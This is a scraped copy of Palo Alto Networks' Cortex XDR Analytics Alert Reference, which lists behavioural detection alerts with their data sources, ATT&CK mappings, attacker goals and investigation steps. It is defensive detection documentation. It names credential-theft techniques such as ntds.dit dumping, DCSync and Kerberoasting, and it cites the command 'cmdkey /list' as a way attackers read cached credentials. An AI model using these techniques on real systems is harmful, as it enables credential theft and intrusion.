Scribd
Upload
102 views142 pages

Cortex XDR Analytics Alert Reference

Uploaded by

Quang Tri
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
102 views142 pages

Cortex XDR Analytics Alert Reference

Uploaded by

Quang Tri
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 142

Cortex XDR™ Analytics Alert Reference

paloaltonetworks.com/documentation
Contact Information
Corporate Headquarters:
Palo Alto Networks
3000 Tannery Way
Santa Clara, CA 95054
www.paloaltonetworks.com/company/contact-support

About the Documentation


• For the most recent version of this guide or for access to related documentation, visit the Technical
Documentation portal www.paloaltonetworks.com/documentation.
• To search for a specific topic, go to our search page www.paloaltonetworks.com/documentation/
document-search.html.
• Have feedback or questions for us? Leave a comment on any page in the portal, or write to us at
[email protected].

Copyright
Palo Alto Networks, Inc.
www.paloaltonetworks.com

© 2021-2021 Palo Alto Networks, Inc. Palo Alto Networks is a registered trademark of Palo
Alto Networks. A list of our trademarks can be found at www.paloaltonetworks.com/company/
trademarks.html. All other marks mentioned herein may be trademarks of their respective companies.

Last Revised
July 7, 2021

2 CORTEX XDR™ ANALYTICS ALERT REFERENCE |


Table of Contents
Cortex XDR Analytics Alert Reference..........................................................7
Analytics Alerts by Required Data Source......................................................................................... 11
A disabled user attempted to authenticate via SSO........................................................................ 19
A disabled user attempted to log in.....................................................................................................20
A rare disabled user attempted to log in............................................................................................21
Account probing........................................................................................................................................ 22
Authentication Attempt From a Dormant Account......................................................................... 23
Bronze-Bit exploit..................................................................................................................................... 24
Cached credentials discovery with cmdkey....................................................................................... 25
Commonly abused AutoIT script connects to an external domain............................................... 26
Commonly abused AutoIT script drops an executable file to disk............................................... 27
DNS Tunneling...........................................................................................................................................28
Delayed Deletion of Files....................................................................................................................... 30
Discovery of host users via WMIC...................................................................................................... 31
Domain federation settings have been modified..............................................................................32
Execution of a password brute-force tool..........................................................................................33
Execution of renamed lolbin.................................................................................................................. 34
External cloud storage access with unusual user agent.................................................................. 35
Failed Connections................................................................................................................................... 36
Failed DNS..................................................................................................................................................37
Failed Login For Locked-Out Account................................................................................................ 39
Failed Login For a Long Username With Special Characters......................................................... 40
First SSO access from ASN for user....................................................................................................41
First SSO access from ASN in organization....................................................................................... 42
First connection from a country in organization...............................................................................43
High Connection Rate............................................................................................................................. 44
Impossible traveler....................................................................................................................................46
Interactive local account enumeration................................................................................................ 47
Interactive login by a machine account.............................................................................................. 48
Interactive login by a service account................................................................................................. 49
Kerberos Pre-Auth Failures by Host....................................................................................................50
Kerberos Pre-Auth Failures by User and Host..................................................................................51
Kerberos Traffic from Non-Standard Process................................................................................... 52
Kerberos User Enumeration...................................................................................................................54
LOLBIN connecting to a rare host....................................................................................................... 55
LOLBIN spawned by an Office executable connected to a rare external host.......................... 56
Large Upload (FTP)................................................................................................................................... 57
Large Upload (Generic)............................................................................................................................ 58
Large Upload (HTTPS)............................................................................................................................. 59
Large Upload (SMTP)............................................................................................................................... 60
Login Password Spray..............................................................................................................................61
Login by a dormant user.........................................................................................................................62
MSBuild Makes a Rare Network Connection.................................................................................... 63
Microsoft Office Process Spawning a Suspicious One-Liner......................................................... 64
Microsoft Office process spawns a commonly abused process....................................................65
Mshta.exe launched with suspicious arguments...............................................................................66
Multiple Rare Process Executions in Organization...........................................................................67
Multiple Weakly-Encrypted Kerberos Tickets Received.................................................................68
Multiple discovery commands............................................................................................................... 69
NTLM Brute Force on a Service Account.......................................................................................... 70

TABLE OF CONTENTS iii


NTLM Hash Harvesting...........................................................................................................................71
Network sniffing via command-line tool.............................................................................................72
New Administrative Behavior................................................................................................................ 73
Port Scan..................................................................................................................................................... 74
Possible DCShadow attempt..................................................................................................................75
Possible DCSync Attempt.......................................................................................................................76
Possible Kerberoasting without SPNs................................................................................................. 77
Possible Search For Password Files..................................................................................................... 78
Possible compromised machine account............................................................................................ 79
PowerShell Initiates a Network Connection to GitHub.................................................................. 80
PowerShell runs suspicious base64-encoded commands............................................................... 81
RDP Connection to localhost................................................................................................................ 82
Random-Looking Domain Names......................................................................................................... 83
Rare SSH Session...................................................................................................................................... 85
Rare Unsigned Process Spawned by Office Process Under Suspicious Directory.................... 86
Rare WinRM Session............................................................................................................................... 87
Rare process execution by user............................................................................................................ 88
Rare process execution in organization.............................................................................................. 89
Recurring access to rare IP.................................................................................................................... 90
Recurring access to rare domain categorized as malicious.............................................................91
Recurring rare domain access from an unsigned process...............................................................92
Recurring rare domain access to dynamic DNS domain................................................................. 93
Remote account enumeration............................................................................................................... 94
Remote command execution via wmic.exe........................................................................................ 95
Remote service command execution from an uncommon source................................................ 96
Remote service start from an uncommon source.............................................................................97
Reverse SSH tunnel to external domain/ip........................................................................................98
SMB Traffic from Non-Standard Process........................................................................................... 99
SSO authentication by a machine account...................................................................................... 101
SSO authentication by a service account.........................................................................................102
SSO with abnormal operating system...............................................................................................103
SSO with new operating system........................................................................................................ 104
Scrcons.exe Rare Child Process.......................................................................................................... 105
Script Connecting to Rare External Host......................................................................................... 106
Spam Bot Traffic.....................................................................................................................................107
Sudoedit Brute force attempt............................................................................................................. 108
Suspicious PowerShell Command Line............................................................................................. 109
Suspicious PowerShell Enumeration of Running Processes.........................................................110
Suspicious Process Spawned by Adobe Reader............................................................................. 111
Suspicious Process Spawned by wininit.exe....................................................................................112
Suspicious RunOnce Parent Process................................................................................................. 113
Suspicious SSO access from ASN...................................................................................................... 114
Suspicious disablement of the Windows Firewall..........................................................................115
Suspicious dump of ntds.dit using Shadow Copy with ntdsutil/vssadmin................................116
Suspicious process accessed a site masquerading as Google......................................................117
Suspicious process execution by scheduled task........................................................................... 118
TGT reuse from different hosts (pass the ticket)........................................................................... 119
UNIX LOLBIN connecting to a rare host......................................................................................... 120
Uncommon ARP cache listing via arp.exe........................................................................................121
Uncommon IP Configuration Listing via ipconfig.exe....................................................................122
Uncommon Service Create/Config.................................................................................................... 123
Uncommon local scheduled task creation via schtasks.exe......................................................... 124
Uncommon net group execution........................................................................................................125
Uncommon remote scheduled task creation...................................................................................126
Uncommon remote service start via sc.exe.....................................................................................127

iv TABLE OF CONTENTS
Uncommon routing table listing via route.exe................................................................................ 128
Uncommon user management via net.exe.......................................................................................129
Unicode RTL Override Character....................................................................................................... 130
Unusual Lolbins Process Spawned by InstallUtil.exe.....................................................................131
Unusual process accessed the PowerShell history file................................................................. 132
Unusual weak authentication by user............................................................................................... 133
Unverified domain added to Azure AD............................................................................................ 134
User attempted to connect from a suspicious country................................................................ 135
User connected from a new country................................................................................................ 136
User successfully connected from a suspicious country.............................................................. 137
Vulnerable driver loaded...................................................................................................................... 138
Weakly-Encrypted Kerberos Ticket Requested.............................................................................. 139
Windows Installer exploitation for local privilege escalation...................................................... 140
WmiPrvSe.exe Rare Child Command Line....................................................................................... 141
Wsmprovhost.exe Rare Child Process.............................................................................................. 142

TABLE OF CONTENTS v
vi TABLE OF CONTENTS
Cortex XDR Analytics Alert Reference
The Cortex XDR Analytics Alert Reference provides a description of every Cortex XDR
Analytics Alert. Use this reference to understand what an alert means and what you should do
about it.

> Analytics Alerts by Required Data Source


> A disabled user attempted to authenticate via SSO
> A disabled user attempted to log in
> A rare disabled user attempted to log in
> Account probing
> Authentication Attempt From a Dormant Account
> Bronze-Bit exploit
> Cached credentials discovery with cmdkey
> Commonly abused AutoIT script connects to an external domain
> Commonly abused AutoIT script drops an executable file to disk
> DNS Tunneling
> Delayed Deletion of Files
> Discovery of host users via WMIC
> Domain federation settings have been modified
> Execution of a password brute-force tool
> Execution of renamed lolbin
> External cloud storage access with unusual user agent
> Failed Connections
> Failed DNS
> Failed Login For Locked-Out Account
> Failed Login For a Long Username With Special Characters
> First SSO access from ASN for user
> First SSO access from ASN in organization
> First connection from a country in organization
> High Connection Rate
> Impossible traveler
> Interactive local account enumeration
> Interactive login by a machine account
> Interactive login by a service account
> Kerberos Pre-Auth Failures by Host
> Kerberos Pre-Auth Failures by User and Host
> Kerberos Traffic from Non-Standard Process
> Kerberos User Enumeration
> LOLBIN connecting to a rare host
> LOLBIN spawned by an Office executable connected to a rare external host
> Large Upload (FTP)
> Large Upload (Generic)
> Large Upload (HTTPS)
> Large Upload (SMTP)
> Login Password Spray
> Login by a dormant user
> MSBuild Makes a Rare Network Connection
> Microsoft Office Process Spawning a Suspicious One-Liner
> Microsoft Office process spawns a commonly abused process 7
> Mshta.exe launched with suspicious arguments
> Multiple Rare Process Executions in Organization
> Multiple Weakly-Encrypted Kerberos Tickets Received
> Multiple discovery commands
> NTLM Brute Force on a Service Account
> NTLM Hash Harvesting
> Network sniffing via command-line tool
> New Administrative Behavior
> Port Scan
> Possible DCShadow attempt
> Possible DCSync Attempt
> Possible Kerberoasting without SPNs
> Possible Search For Password Files
> Possible compromised machine account
> PowerShell Initiates a Network Connection to GitHub
> PowerShell runs suspicious base64-encoded commands
> RDP Connection to localhost
> Random-Looking Domain Names
> Rare SSH Session
> Rare Unsigned Process Spawned by Office Process Under Suspicious Directory
> Rare WinRM Session
> Rare process execution by user
> Rare process execution in organization
> Recurring access to rare IP
> Recurring access to rare domain categorized as malicious
> Recurring rare domain access from an unsigned process
> Recurring rare domain access to dynamic DNS domain
> Remote account enumeration
> Remote command execution via wmic.exe
> Remote service command execution from an uncommon source
> Remote service start from an uncommon source
> Reverse SSH tunnel to external domain/ip
> SMB Traffic from Non-Standard Process
> SSO authentication by a machine account
> SSO authentication by a service account
> SSO with abnormal operating system
> SSO with new operating system
> Scrcons.exe Rare Child Process
> Script Connecting to Rare External Host
> Spam Bot Traffic
> Sudoedit Brute force attempt
> Suspicious PowerShell Command Line
> Suspicious PowerShell Enumeration of Running Processes
> Suspicious Process Spawned by Adobe Reader
> Suspicious Process Spawned by wininit.exe
> Suspicious RunOnce Parent Process
> Suspicious SSO access from ASN
> Suspicious disablement of the Windows Firewall
> Suspicious dump of ntds.dit using Shadow Copy with ntdsutil/vssadmin
> Suspicious process accessed a site masquerading as Google
> Suspicious process execution by scheduled task

8 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
> TGT reuse from different hosts (pass the ticket)
> UNIX LOLBIN connecting to a rare host
> Uncommon ARP cache listing via arp.exe
> Uncommon IP Configuration Listing via ipconfig.exe
> Uncommon Service Create/Config
> Uncommon local scheduled task creation via schtasks.exe
> Uncommon net group execution
> Uncommon remote scheduled task creation
> Uncommon remote service start via sc.exe
> Uncommon routing table listing via route.exe
> Uncommon user management via net.exe
> Unicode RTL Override Character
> Unusual Lolbins Process Spawned by InstallUtil.exe
> Unusual process accessed the PowerShell history file
> Unusual weak authentication by user
> Unverified domain added to Azure AD
> User attempted to connect from a suspicious country
> User connected from a new country
> User successfully connected from a suspicious country
> Vulnerable driver loaded
> Weakly-Encrypted Kerberos Ticket Requested
> Windows Installer exploitation for local privilege escalation
> WmiPrvSe.exe Rare Child Command Line
> Wsmprovhost.exe Rare Child Process

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 9
© 2021 Palo Alto Networks, Inc.
10 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Analytics Alerts by Required Data Source
The Analytics alerts that Cortex XDR can raise depend on the data sources you integrate with Cortex XDR.
For example if the Cortex XDR agent is your only data source, the app raises only the alerts it can detect
from agent endpoint data. Some alerts can also require a combination of data sources in order to raise the
alert. Additionally, you can improve the accuracy of some Analytics alerts by adding additional data sources.
The following table displays the required data sources.

Required Data Alert Optional Data Sources


Source

AzureAD, Okta, or PingOne

A disabled user attempted to authenticate via SSO For increased accuracy, you can
also add any of the following
optional data sources:
• Palo Alto Networks Firewall
Logs
• XDR Agent

First SSO access from ASN for user —

First SSO access from ASN in organization —

First connection from a country in organization —

Impossible traveler For increased accuracy, you can


also add the following optional
data source: Palo Alto Networks
Firewall Logs

SSO authentication by a machine account —

SSO authentication by a service account —

Suspicious SSO access from ASN —

User attempted to connect from a suspicious —


country

User connected from a new country —

User successfully connected from a suspicious For increased accuracy, you can
country also add the following optional
data source: Palo Alto Networks
Firewall Logs

XDR Agent

A disabled user attempted to log in —

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 11
© 2021 Palo Alto Networks, Inc.
Required Data Alert Optional Data Sources
Source

A rare disabled user attempted to log in —

Account probing —

Cached credentials discovery with cmdkey —

Commonly abused AutoIT script drops an —


executable file to disk

Delayed Deletion of Files —

Discovery of host users via WMIC —

Execution of a password brute-force tool —

Execution of renamed lolbin —

Failed Connections —

Interactive local account enumeration —

Interactive login by a machine account —

Interactive login by a service account —

Kerberos Traffic from Non-Standard Process For increased accuracy, you can
also add the following optional
data source: Palo Alto Networks
Firewall Logs

LOLBIN connecting to a rare host For increased accuracy, you can


also add the following optional
data source: Palo Alto Networks
Firewall Logs

LOLBIN spawned by an Office executable —


connected to a rare external host

Large Upload (Generic) —

Login Password Spray —

Login by a dormant user —

MSBuild Makes a Rare Network Connection For increased accuracy, you can
also add the following optional
data source: Palo Alto Networks
Firewall Logs

12 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Required Data Alert Optional Data Sources
Source

Microsoft Office Process Spawning a Suspicious —


One-Liner

Microsoft Office process spawns a commonly —


abused process

Mshta.exe launched with suspicious arguments —

Multiple Rare Process Executions in Organization —

Multiple discovery commands —

Network sniffing via command-line tool —

Possible Search For Password Files —

PowerShell Initiates a Network Connection to For increased accuracy, you can


GitHub also add the following optional
data source: Palo Alto Networks
Firewall Logs

PowerShell runs suspicious base64-encoded —


commands

RDP Connection to localhost For increased accuracy, you can


also add the following optional
data source: Palo Alto Networks
Firewall Logs

Rare SSH Session For increased accuracy, you can


also add the following optional
data source: Palo Alto Networks
Firewall Logs

Rare Unsigned Process Spawned by Office Process —


Under Suspicious Directory

Rare WinRM Session For increased accuracy, you can


also add the following optional
data source: Palo Alto Networks
Firewall Logs

Rare process execution by user —

Rare process execution in organization —

Recurring access to rare IP —

Recurring rare domain access from an unsigned —


process

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 13
© 2021 Palo Alto Networks, Inc.
Required Data Alert Optional Data Sources
Source

Remote account enumeration —

Remote command execution via wmic.exe —

Remote service command execution from an —


uncommon source

Remote service start from an uncommon source —

Reverse SSH tunnel to external domain/ip For increased accuracy, you can
also add the following optional
data source: Palo Alto Networks
Firewall Logs

SMB Traffic from Non-Standard Process For increased accuracy, you can
also add the following optional
data source: Palo Alto Networks
Firewall Logs

Scrcons.exe Rare Child Process —

Script Connecting to Rare External Host For increased accuracy, you can
also add the following optional
data source: Palo Alto Networks
Firewall Logs

Sudoedit Brute force attempt —

Suspicious PowerShell Command Line —

Suspicious PowerShell Enumeration of Running —


Processes

Suspicious Process Spawned by Adobe Reader —

Suspicious Process Spawned by wininit.exe —

Suspicious RunOnce Parent Process —

Suspicious disablement of the Windows Firewall —

Suspicious dump of ntds.dit using Shadow Copy —


with ntdsutil/vssadmin

Suspicious process accessed a site masquerading —


as Google

Suspicious process execution by scheduled task —

UNIX LOLBIN connecting to a rare host —

14 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Required Data Alert Optional Data Sources
Source

Uncommon ARP cache listing via arp.exe —

Uncommon IP Configuration Listing via —


ipconfig.exe

Uncommon Service Create/Config —

Uncommon local scheduled task creation via —


schtasks.exe

Uncommon net group execution —

Uncommon remote scheduled task creation —

Uncommon remote service start via sc.exe —

Uncommon routing table listing via route.exe —

Uncommon user management via net.exe —

Unicode RTL Override Character —

Unusual Lolbins Process Spawned by InstallUtil.exe —

Unusual process accessed the PowerShell history —


file

Unusual weak authentication by user —

Vulnerable driver loaded —

Windows Installer exploitation for local privilege —


escalation

WmiPrvSe.exe Rare Child Command Line —

Wsmprovhost.exe Rare Child Process —

Palo Alto Networks Firewall Logs or XDR Agent

Authentication Attempt From a Dormant Account —

Bronze-Bit exploit —

Failed Login For Locked-Out Account —

Failed Login For a Long Username With Special —


Characters

Kerberos Pre-Auth Failures by Host —

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 15
© 2021 Palo Alto Networks, Inc.
Required Data Alert Optional Data Sources
Source

Kerberos Pre-Auth Failures by User and Host —

Kerberos User Enumeration —

Large Upload (FTP) —

Large Upload (HTTPS) —

Large Upload (SMTP) —

Multiple Weakly-Encrypted Kerberos Tickets —


Received

Possible Kerberoasting without SPNs —

Possible compromised machine account —

Spam Bot Traffic —

TGT reuse from different hosts (pass the ticket) —

Weakly-Encrypted Kerberos Ticket Requested —

Palo Alto Networks Firewall Logs

Commonly abused AutoIT script connects to an For increased accuracy, you can
external domain also add the following optional
data source: XDR Agent

DNS Tunneling For increased accuracy, you can


also add the following optional
data source: XDR Agent

Failed Connections —

Failed DNS For increased accuracy, you can


also add the following optional
data source: XDR Agent

LOLBIN spawned by an Office executable —


connected to a rare external host

Large Upload (Generic) —

Random-Looking Domain Names For increased accuracy, you can


also add the following optional
data source: XDR Agent

Recurring access to rare IP —

16 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Required Data Alert Optional Data Sources
Source

Recurring access to rare domain categorized as For increased accuracy, you can
malicious also add the following optional
data source: XDR Agent

Recurring rare domain access from an unsigned —


process

Recurring rare domain access to dynamic DNS For increased accuracy, you can
domain also add the following optional
data source: XDR Agent

Suspicious process accessed a site masquerading —


as Google

UNIX LOLBIN connecting to a rare host —

Azure Audit Log

Domain federation settings have been modified —

Unverified domain added to Azure AD —

Cloud Logs

External cloud storage access with unusual user —


agent

XDR Agent, AzureAD, or Okta

First connection from a country in organization —

Impossible traveler For increased accuracy, you can


also add the following optional
data source: Palo Alto Networks
Firewall Logs

User attempted to connect from a suspicious —


country

User connected from a new country —

User successfully connected from a suspicious For increased accuracy, you can
country also add the following optional
data source: Palo Alto Networks
Firewall Logs

Palo Alto Networks Firewall Logs, XDR Agent, Corelight, or Third-Party Firewalls

High Connection Rate —

NTLM Brute Force on a Service Account —

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 17
© 2021 Palo Alto Networks, Inc.
Required Data Alert Optional Data Sources
Source

NTLM Hash Harvesting —

New Administrative Behavior —

Port Scan —

Possible DCShadow attempt —

Possible DCSync Attempt —

Palo Alto Networks Firewall Logs, XDR Agent, AzureAD, Okta, or PingOne

NTLM Brute Force on a Service Account —

NTLM Hash Harvesting —

AzureAD or Okta

SSO with abnormal operating system For increased accuracy, you can
also add the following optional
data source: XDR Agent

SSO with new operating system —

18 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
A disabled user attempted to authenticate via
SSO
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: AzureAD, Okta, or PingOne
For increased accuracy, you can also add any of the following optional
data sources:
• Palo Alto Networks Firewall Logs
• XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Low

Description
A disabled user attempted to authenticate via SSO.

Attacker's Goals
Use an account that was possibly compromised in the past to gain access to the network.

Investigative Actions
• See whether the service authentication was successful.
• Confirm that the activity is benign (e.g. the user returned from a long leave of absence).
• Check whether you have issues with your Directory Sync Services failing to sync data from Active
Directory.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 19
© 2021 Palo Alto Networks, Inc.
A disabled user attempted to log in
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Informational

Description
A disabled user attempted to log in.

Attacker's Goals
Use an account that was possibly compromised in the past to gain access to the network.

Investigative Actions
• See whether the authentication was successful.
• Confirm that the activity is benign (e.g. the user was recently enabled by an authorized entity).
• Check whether you have issues with your Directory Sync Services failing to sync data from Active
Directory.

20 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
A rare disabled user attempted to log in
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Low

Description
A rare disabled user attempted to log in.

Attacker's Goals
Use an account that was possibly compromised in the past to gain access to the network.

Investigative Actions
• See whether the authentication was successful.
• Confirm that the activity is benign (e.g. the user was recently enabled by an authorized entity).
• Check further actions or attempts by the user.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 21
© 2021 Palo Alto Networks, Inc.
Account probing
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic • Initial Access (TA0001)


• Credential Access (TA0006)

ATT&CK Technique • Valid Accounts (T1078)


• Brute Force (T1110)

Severity Low

Description
A user failed to log in to multiple hosts it never accessed before in a short amount of time. This may indicate
the account is compromised and an attacker is probing for a host it can access with those credentials.

Attacker's Goals
Gain access to hosts by using stolen user-account credentials.

Investigative Actions
Check if the user account was compromised, and which resources it could access.

22 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Authentication Attempt From a Dormant
Account
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 31 Days

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Valid Accounts (T1078)

Severity Low

Description
A dormant user account tried to authenticate to a service using a TGS, after having been unused for a year
or more. This may indicate the account is misused by an attacker.

Attacker's Goals
Use a compromised user account which has not been used in a long while, and are therefore less likely to be
noticed.

Investigative Actions
• See whether the service authentication was successful.
• Confirm that the activity is benign (e.g. the user returned from a long leave of absence).
• Check whether you have issues with your Directory Sync Services failing to sync data from Active
Directory.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 23
© 2021 Palo Alto Networks, Inc.
Bronze-Bit exploit
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique User Execution (T1204)

Severity High

Description
A forwardable Kerberos ticket for delegation of a Protected User was observed

Attacker's Goals
Gain special user Kerberos ticket to move laterally.

Investigative Actions
• Check the initiating service account delegation privileges.
• Check the delegated account credentials and if it has high privileges.
• Check the ticket destination to verify whether it is a sensitive asset.

24 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Cached credentials discovery with cmdkey
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Credential Access (TA0006)


• Discovery (TA0007)

ATT&CK Technique • OS Credential Dumping (T1003)


• Account Discovery (T1087)

Severity Low

Description
Cmdkey is a built-in Windows tool that can cache domain user credentials for use on specific target
machines, Attackers can access cached user credentials using cmdkey /list.

Attacker's Goals
Access cached user credentials.

Investigative Actions
• Check the initiator process for additional suspicious activity.
• Check if the host is a shared host that multiple users credentials can be extracted from.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 25
© 2021 Palo Alto Networks, Inc.
Commonly abused AutoIT script connects to
an external domain
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Palo Alto Networks Firewall Logs


For increased accuracy, you can also add the following optional data
source: XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Exfiltration (TA0010)

ATT&CK Technique Automated Exfiltration (T1020)

Severity Medium

Description
AutoIT scripts have legitimate uses, but are often abused by malware to execute in a signed process
context.

Attacker's Goals
Communicate with malware running on your network to control malware activities, perform software
updates on the malware, or to take inventory of infected machines.

Investigative Actions
• AutoIT scripts have legitimate uses, but are often abused by malware to execute in a signed process
context.
• Identify the process contacting the remote domain and determine whether the traffic is malicious.

26 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Commonly abused AutoIT script drops an
executable file to disk
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique Command and Scripting Interpreter: Windows Command Shell


(T1059.003)

Severity Informational

Description
AutoIT scripts have legitimate uses, but are often abused by malware to execute in a signed process context

Attacker's Goals
Gain code execution on the host and evade security controls.

Investigative Actions
• Check whether the command line executed is benign or normal for the host and/or user performing it.
• Check whether the user in the command line is an administrator or other sensitive account.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 27
© 2021 Palo Alto Networks, Inc.
DNS Tunneling
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 10 Minutes

Deduplication Period 1 Hour

Required Data Palo Alto Networks Firewall Logs


For increased accuracy, you can also add the following optional data
source: XDR Agent

Required Detection Modules No module required

ATT&CK Tactic • Command and Control (TA0011)


• Exfiltration (TA0010)

ATT&CK Technique • Application Layer Protocol (T1071)


• Exfiltration Over Alternative Protocol (T1048)

Severity Medium

Description
10 KB or more were sent encoded in subdomain names during a 10-minute window. All subdomains
queried were under a single suspicious domain.
DNS tunneling encodes data in DNS queries and responses, allowing an attacker to bypass firewalls and
proxies to reach his or her command and control server, even when HTTP/S traffic is blocked.
The endpoint may be remotely controlled by an attacker, and/or an attacker may have exfiltrated data from
it.

Attacker's Goals
Communicate with malware running on your network to control malware activities, perform software
updates on the malware, or to take inventory of infected machines.

Investigative Actions
• Verify that the source device or process is not an approved security solution.
• Verify if the DNS query types are non-standard. DNS tunnels use uncommon query types that enable
encoding of more data. Examples include: INIT, PRIVATE, NULL, SRV, KEY, and TXT.

28 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
• If the affected endpoint is operating Windows, verify that the DNS traffic is coming from svchost.exe
and search for other processes that ran when the alert triggered. In Windows, the DNS requests go
through svchost.exe.
• Verify the responses per DNS query. Many responses per query may indicate a tool being downloaded.
• Verify the destination domain details and compare the number of endpoints in your network that access
the domain over time to see if this is an uncommonly contacted domain.
• Verify the source web-browser traffic to determine if the process was generated by user action, if the
user did not initiate the traffic it can be indicative of malicious activity.
• Verify non-DNS traffic to the domain. Any traffic other than DNS queries to the destination domain may
indicate a legitimate domain and not used solely for command-and-control or data exfiltration.

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 29
© 2021 Palo Alto Networks, Inc.
Delayed Deletion of Files
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Indicator Removal on Host: File Deletion (T1070.004)

Severity Low

Description
A command line deleting files used the time-out or ping commands to delay the file deletion. This is
suspicious, as malware sometimes use these techniques to cover their tracks.

Attacker's Goals
Evade security controls and possibly cover their tracks.

Investigative Actions
Check whether the executing process is benign, and if this was a desired behavior as part of its normal
execution flow.

30 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
Discovery of host users via WMIC
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique System Owner/User Discovery (T1033)

Severity Low

Description
Attackers may use wmic.exe to list the users of a host, and potentially its owner.

Attacker's Goals
Attackers can attempt to use the command to discover host users and enumerate a huge amount of
information.

Investigative Actions
Verify whether the command that was executed is benign or normal for the host and/or user performing it
(for example, it may be an IT script).

CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference 31
© 2021 Palo Alto Networks, Inc.
Domain federation settings have been
modified
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data Azure Audit Log

Required Detection Modules No module required

ATT&CK Tactic Persistence (TA0003)

ATT&CK Technique Account Manipulation: Additional Cloud Credentials (T1098.001)

Severity Low

Description
A user or application has modified the federation settings on the domain

Attacker's Goals
An attacker attempts to change Active Directory configuration for persistence or defense evasion.

Investigative Actions
• Check what configuration has been changed.
• Check whether the user changing the configuration is permitted.

